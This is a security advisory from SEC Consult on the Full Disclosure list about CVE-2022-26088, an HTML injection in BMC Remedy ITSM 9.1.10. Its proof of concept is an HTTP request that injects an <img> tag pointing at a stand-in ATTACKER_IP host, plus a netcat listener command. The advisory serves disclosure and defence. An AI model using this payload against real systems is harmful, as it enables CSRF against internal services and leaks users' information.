SEC Consult Vulnerability Lab Security Advisory < 20221110-0 > ======================================================================= title: HTML Injection product: BMC Remedy ITSM-Suite vulnerable version: 9.1.10 (= 20.02 in new versioning scheme) fixed version: 22.1 CVE number: CVE-2022-26088 impact: Low homepage: https://www.bmc.com/it-solutions/remedy-itsm.html found: 2021-08-11 by: Daniel Hirschberger (Office Bochum) SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model." Source: https://docs.bmc.com/docs/itsm91/home-608490971.html Business recommendation: ------------------------ The vendor provides an updated version which should be installed immediately. The vendor states that: > We have done hardening in version 22.1. > However, we do not agree with assigning the CVE to this vulnerability. > As mentioned previously this is an informative vulnerability, and no real impact is demonstrated. Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information. Vulnerability overview/description: ----------------------------------- 1) HTML Injection (CVE-2022-26088) An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the "To:" field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL. After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed. By inserting an <img> with an arbitrary "src" attribute, an attacker can force the user's browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information. Proof of concept: ----------------- 1) HTML Injection (CVE-2022-26088) When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button. The HTML injection can be performed by intercepting this request and changing the 'Email.To.InternetEmail' parameter. The modified request is: ------------------------------------------------------------------------------- PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1 Host: TARGET Cookie: […] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 X-Xsrf-Token: SOME_TOKEN Content-Length: ADAPT_AS_NEEDED Te: trailers Connection: close { "worknote": "pentest", "access": true, "Email.From.Person": { "email": "SOME_SENDING_MAIL", "fullName": "Pentest - SEC Consult", "loginId": "USERNAME" }, "Email.Subject": "SOME_SUBJECT", "Email.Body": "test2", "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a...@example.test", "workInfoType": 16000 } ------------------------------------------------------------------------------- The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted: "<img src=http://LOCAL_IP:8001/>a...@example.test" The a...@example.test is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident. Now we start a local netcat listener with the command $ nc -vnlp 8001 Now we click on the number '1' in the activity log and see that the browser issues a request to our 'netcat' instance. This confirms that the browser tries to load the image from the specified URL. Vulnerable / tested versions: ----------------------------- The following version has been tested: * 9.1.10 this corresponds to version 20.02 as stated at the following URL: https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping Vendor contact timeline: ------------------------ 2021-09-07: Contacting vendor through email (app...@bmc.com). 2021-09-28: Vendor states that they did not get the first email. 2021-09-29: Resending the advisory to their renewed GPG key. 2021-10-29: Fix pending, request to delay publication. 2021-11-18: Vulnerability is fixed and the fix is being evaluated. 2022-01-17: Asking for a status update. 2022-01-17: Vulnerability is fixed, no scheduled release. 2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'. 2022-02-24: Fixed in Smart-IT 22.1, release postponed. 2022-03-30: Release postponed to May 2022. 2022-04-20: Asking if the fixed version will be released in May. 2022-05-17: Asking if the fixed version will be released in May. 2022-05-23: Release rescheduled to end of June/July 2022-08-04: Asking for status 2022-08-05: Product was released 2022-08-31: Asking for link to update 2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again 2022-09-06: Vendor asks for final version of advisory 2022-09-06: Asking vendor for a new GPG key because of expiry 2022-09-07: Sending the final advisory to the vendor 2022-09-12: Vendor will check the advisory and answer in 1 or 2 days 2022-09-14: Vendor states that their application is not vulnerable to CSRF and asks if other data could be leaked via the HTTP request 2022-09-15: We clarify that their application does not seem to be vulnerable to CSRF but the HTML injection allows CSRFing other applications in the intranet. Also we did not have time to assess if other data besides User-Agent and the client's IP can be leaked. 2022-10-04: We request an update to the previous mail. 2022-10-19: Vendor sticks to their own original impact analysis. 2022-11-10: Public release of security advisory. Solution: --------- Upgrade to version 22.1 or later which can be downloaded at the vendor's page: https://www.bmc.com/support/resources/product-downloads.html Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. 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Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger / @2022 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/